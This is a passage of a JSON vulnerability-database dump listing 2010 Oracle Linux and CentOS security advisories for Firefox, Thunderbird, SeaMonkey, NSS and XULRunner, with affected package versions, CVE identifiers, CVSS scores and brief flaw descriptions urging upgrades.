["CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3182"], "modified": "2010-10-20T00:00:00", "id": "ELSA-2010-0780", "href": "http://linux.oracle.com/errata/ELSA-2010-0780.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:46:22", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "[1.5.0.12-33.0.1.el4]\n- Add thunderbird-oracle-default-prefs.js for errata rebuild and remove\n thunderbird-redhat-default-prefs.js\n Replaced clean.gif in tarball\n[1.5.0.12-33]\n- Added fixes from 1.9.1.15", "edition": 3, "reporter": "Oracle", "published": "2010-10-29T00:00:00", "title": "thunderbird security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-29T00:00:00", "id": "ELSA-2010-0812", "href": "http://linux.oracle.com/errata/ELSA-2010-0812.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:40:11", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "src", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "src", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "src", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "x86_64", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "ia64", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "i386", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.i386.rpm", "packageName": "firefox", "operator": "lt"}], "description": "[3.6.11-4.0.1.el4_8]\r\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\r\n and remove the corresponding Red Hat ones\r\n \n[3.6.11-4.el4_8]\r\n- Add upstream patch for CVE-2010-3765 ", "edition": 3, "reporter": "Oracle", "published": "2010-10-28T00:00:00", "title": "firefox security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-28T00:00:00", "id": "ELSA-2010-0808", "href": "http://linux.oracle.com/errata/ELSA-2010-0808.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:25:28", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0782.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-devel-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-devel-3.12.8-1.el4_8.x86_64.rpm", "packageName": "nss-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-tools-3.12.8-1.el4_8.i386.rpm", "packageName": "nss-tools", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.i386.rpm", "packageName": "firefox", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.x86_64.rpm", "packageName": "xulrunner", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.x86_64.rpm", "packageName": "nss", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.src.rpm", "packageName": "xulrunner", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.src.rpm", "packageName": "xulrunner", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.x86_64.rpm", "packageName": "firefox", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.x86_64.rpm", "packageName": "xulrunner-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.x86_64.rpm", "packageName": "firefox", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-tools-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-tools", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss-pkcs11-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-pkcs11-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-pkcs11-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-tools-3.12.8-1.el4_8.x86_64.rpm", "packageName": "nss-tools", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-devel-3.12.8-1.el4_8.i386.rpm", "packageName": "nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.i386.rpm", "packageName": "firefox", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.i386.rpm", "packageName": "firefox", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-tools-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss-tools", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0782\n\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox. Network Security Services (NSS) is\na set of libraries designed to support the development of security-enabled\nclient and server applications.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183,\nCVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running Firefox, allow arbitrary JavaScript to be executed in the\ncontext of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could\ncreate a malicious web page that, when viewed by a victim, could steal\nprivate data from a different website the victim has loaded with Firefox.\n(CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nFirefox, if that user ran Firefox from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nThis update also provides NSS version 3.12.8 which is required by the\nupdated Firefox version, fixing the following security issues:\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in Firefox accepted DHE keys that were 256\nbits in length. This update removes support for 256 bit DHE keys, as such\nkeys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way NSS matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. NSS incorrectly accepted connections to IP addresses that fell\nwithin the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.6.11. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.6.11, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017093.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017094.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017113.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017114.html\n\n**Affected packages:**\nfirefox\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\nxulrunner\nxulrunner-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0782.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-20T10:29:05", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "firefox, nss, xulrunner security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-25T08:24:38", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017093.html", "id": "CESA-2010:0782", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:31", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0781.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-chat-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-chat", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-js-debugger", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-chat-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-chat", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-mail-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-mail", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nspr", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nspr", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nss", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-dom-inspector", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-devel-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-devel-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nspr", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-dom-inspector", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-chat-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-chat", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-chat-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-chat", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nspr-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-mail-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-mail", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-mail-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-mail", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-js-debugger", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-js-debugger", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-devel-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-devel-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-mail-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-mail", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0781\n\n\nSeaMonkey is an open source web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2010-3176, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in SeaMonkey converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running SeaMonkey, allow arbitrary JavaScript to be executed in\nthe context of the Gopher domain. (CVE-2010-3177)\n\nA flaw was found in the script that launches SeaMonkey. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nSeaMonkey, if that user ran SeaMonkey from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in SeaMonkey accepted DHE keys that were\n256 bits in length. This update removes support for 256 bit DHE keys, as\nsuch keys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way SeaMonkey matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. SeaMonkey incorrectly accepted connections to IP addresses that\nfell within the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017105.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017106.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017111.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017112.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0781.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-25T08:12:58", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "seamonkey security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3182", "CVE-2010-3170"], "modified": "2010-10-25T08:20:46", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017105.html", "id": "CESA-2010:0781", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:32", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0780.html", "https://rhn.redhat.com/errata/RHSA-2010-0780.htm", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.x86_64.rpm", "packageName": "thunderbird", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}, {"OS": 